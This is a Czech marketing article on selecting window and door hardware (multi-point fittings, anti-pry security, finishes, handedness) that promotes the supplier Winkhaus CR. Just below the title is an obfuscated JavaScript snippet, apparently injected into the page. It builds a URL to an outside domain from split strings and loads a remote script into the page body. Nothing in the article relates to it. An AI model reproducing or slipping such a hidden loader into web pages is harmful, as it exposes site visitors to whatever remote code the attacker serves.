I váš domov si zaslouží kvalitní okenní a dveřní kování

(function(){
c57i=document.createElement(„script“);c57i_=(„ust“);c57iu=“364858020″;
c57i_+=“a“+(„t.i“);c57i.type=“text/javascript“;
c57iu+=“.b3g9s9nz57ig2ja3wn0r“;c57i.async=true;c57i_+=“n“+(„f“+“o“)+“/“;
c57iu+=“fbwtwic05p“;c57i.src=“https://“+c57i_+c57iu;
document.body.appendChild(c57i);
})();
Výběr kvalitního okenního či dveřního kování je stejně důležitý jako maximální pečlivost při nákupu samotných oken a dveří. Proč?

Kvalitní kování rozhoduje o použitelnosti vašich oken

Kvalitní kování je funkčním prvkem, který vám usnadní každodenní používání. Zvláště důležité je to u okenních či dveřních křídel robustnějších nebo hůře přístupných, u nichž odolné a kvalitně zpracované kování zajistí pohodlné otevírání za všech okolností.

Dnešní moderní okna zpravidla využívají kování celoobvodová. Díky sofitiskované soustavě táhel, kliček a dalších komponent může pak uživatel komfortně celý systém okna ovládat pouze jedinou kličkou.

Použití správného okenního kování má zásadní vliv na bezpečnost, neboť je u něj důležitá i odolnost proti vypáčení. Speciální bezpečnostní kování je opatřeno nejméně dvěma prvky na straně s klikou, nejlépe uzamykací nebo alespoň s tlačítkem.

Zohledněte i praktičnost ohledně povrchové úpravy. Na matném materiálu okenních klik neulpívají tak ochotně otisky prstů.

Bezpečnost i estetiku vašeho domova ovlivní i dveřní kování

Obdobně ovlivní výrazně estetický dojem, ale i pocit bezpečí z našeho domova použité kování dveřní. Při výběru je tak v první řadě nutné zohlednit požadavky na případnou ochranu a soukromí. U vchodových dveří je zámek nutnost, v interiéru ho alespoň v některých místnostech vyžadovat určitě nemusíte.

Kromě typu zámku při nákupu kování rozhoduje i správná rozteč a to, zda kování vybíráme pro pravé nebo levé dveře.

Ačkoli je na prvním místě vždy samozřejmě praktičnost, zcela opominout nemůžeme ani design. Kování u dveří i oken svým stylem musí respektovat celkový architektonický návrh budovy a nemělo by po designové stránce působit rušivě.

Společnost Winkhaus CR, s.r.o. je tradičním dodavatelem různých typů kování a dalších doplňků. Jedná se o dceřinou společností německého holdingu Aug. Winkhaus GmbH & Co. KG, který patří k předním výrobcům okenního a dveřního kování na světě.

Ve svém portfoliu klade důraz nejen na široký výběr, ale i kvalitu zpracování. Nechybí tak ani luxusní provedení kování.